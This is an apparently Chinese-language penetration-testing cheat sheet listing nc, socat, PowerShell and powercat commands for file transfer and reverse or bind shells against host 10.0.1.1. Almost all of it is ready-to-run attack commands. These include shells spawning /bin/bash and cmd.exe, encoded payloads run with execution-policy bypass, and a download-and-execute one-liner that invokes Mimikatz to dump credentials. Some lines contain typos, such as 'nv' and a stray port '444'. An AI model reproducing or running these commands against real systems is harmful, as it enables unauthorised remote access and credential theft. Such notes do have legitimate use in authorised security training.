3)practice tools
nc
1.Transferring Files
接收方:
nc -lvvp 4444 > recive.file
发送方:
nc -vv 10.0.1.1 4444 < send.file
2.Reverse Shell
victim:
nc -vv 10.0.1.1 4444 -e /bin/bash
evil:
nc -lvvp 4444
3.Bind Shells
socat
1.File Transfers
发送方:
sudo socat TCP4-LISTEN:4444,fork file:localfilename
向请求端口port 的程序传送本地文件localfilename的内容
接收方:
socat TCP4:10.0.1.1:4444 file:receivefilename,create
接收请求得到的文件,存储到当前目录下的receivefilenam中
2.Reverse Shells
victim:
socat TCP4:10.0.1.1:4444 EXEC:/bin/bash.
evil:
sudo socat TCP4-LISTEN:4444 1
3.Bind Shells
powershell&powercat
1.1 PowerShell File Transfers
通过powershell从远程地址下载文件
powershell -c "(New-Object system.net.webclient).downloadfile('http://10.0.1.1/evil.ps','./evil.ps')"
1.2 PowerShell Reverse Shells
1.3 PowerShell Bind Shells
2.1 Powercat File Transfers
powercat -c 10.0.1.1 -p 4444 -i fullfilepath -v
powercat -l -p 4444 -of filepath -v
2.2 Powercat Reverse Shells
victim:
powercat -c 10.0.1.1 -p 4444 -e cmd.exe
或者
powercat -c 10.0.1.1 -p 4444
evil:
nv -lvvp 4444
或者
powercat -vvp 444 -ep
-ep直接返回powershell
2.3 Powercat Bind Shells
victim:
powercat -l -p 4444 -e cmd.exe -v
evil:
nc -vv 10.0.1.1 4444
2.4 Powercat Stand-Alone Payloads
- 绕过限制
powercat -c 10.0.1.1 -p 4444 -e cmd.exe -ge > encodereverseshell.ps1
PowerShell -ExecutionPolicy Bypass -File encodereverseshell.ps1
- 绕过限制远程执行powershell脚本
powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.1/payload');Invoke-Mimikatz-DumpCreds"
浙公网安备 33010602011771号